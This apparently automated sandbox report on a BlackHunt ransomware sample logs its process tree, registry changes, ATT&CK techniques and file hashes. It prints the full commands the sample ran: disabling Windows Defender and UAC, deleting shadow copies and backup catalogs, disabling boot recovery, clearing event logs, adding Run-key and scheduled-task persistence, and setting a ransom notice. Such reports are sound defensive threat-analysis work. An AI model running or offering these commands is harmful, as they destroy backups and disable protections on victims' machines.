0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 129 PID 2992 wrote to memory of 2540 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 129 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe"C:\Users\Admin\AppData\Local\Temp\0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2992 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2892
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2072
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1624
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2444
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1796
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe" /F2⤵PID:2424
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1956
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1636
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1064
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1712
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2772
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1568
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵
- Enumerates connected drives
PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3020
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2736
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1560
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1328
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2936
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1944
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2040
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:980
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1348
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:592
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1840
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2844
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2356
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2352
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1652
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1980
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2168
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2240
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2032
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe"2⤵
- Deletes itself
PID:2216
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1412
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1088
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe" /F1⤵
- Creates scheduled task(s)
PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1316
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:108
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2556
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\2⤵
- Enumerates connected drives
PID:1788
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2452
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:2448
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2592 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2972
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2976
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:600
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2180
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1940
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:1244
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:904
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:2868
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1788
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2280
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:1936
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1568
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:1992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:1680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2376
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2260
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:704
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵PID:2496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵PID:3032
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2680
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13599308551334294510-8180075043439676632082609820035140431655003321975862288"1⤵PID:1644
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "72244855147854660376848815-1356481232-403617474-1102276205-871632068-1627686882"1⤵
- Modifies registry class
PID:3032
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2421477552650836611398768487-1363397686-1653870598-1711048885-16573688171501756943"1⤵PID:2592
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-200522818-58958601612859869461300738001-14781021558829236415336830822024356786"1⤵PID:1764
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1060554857-462430925592299712482737676-16575295471040258937970015613672688988"1⤵PID:2508
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-902505123-5007394291904500093-359930835-2070561770489341465-180503120-1983378358"1⤵
- Modifies registry class
PID:2496
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-167151121259211321-788196189-5071605161634499075-17058447391432797169853938328"1⤵PID:2868
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:1688
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5c82fcaff13fcfaecaace6396734a6e76
SHA1b443af87e9787b629998da975df055fe2c277123
SHA2563b1e33df81becdb236501cbbcf985451881b4e80dfc14c171b8ed598140e6d1d
SHA512a59e4ef399fae1d5bdddf22ebd92da396ee739efd33be302e298588aaddffc9a0e19d773576634458b0379e652c2420d8c61c5c9ba77ee5ed8ff285dafe9f802
-
Filesize
684B
MD52d459e750d48e9f7caa4f8c4b1b58781
SHA1b890973120e6b50018b6598232bb6af9207fbed0
SHA2566033403af1939c0ccf9fd08e87d0e5050a5259aa9ab959706e9b15ca544d1d25
SHA51207dd24dfefe48aff54e0cc9412486dea197e17c743372f556b0251d27e7f26a86783b54dcd228df8a554556495ac6e60f44ee90efabdac517a4de84296ec60ff
-
Filesize
1KB
MD5eadae4d28b4808f154edf1f298f4723e
SHA17ea1387e6261ae79c6c28ed080d88a12e82a071c
SHA256a27dfd270274f292cc80a0107deb7d8d946e92ca534e9a1e25e425516390218f
SHA5123c996c4e4ef5e81d7c992e5e77d6a238a9280c734b2a0621414682b9874b87893146328f2cfd5be726c2bd9c994816496b017d27289a4f3514d11923c72a9c57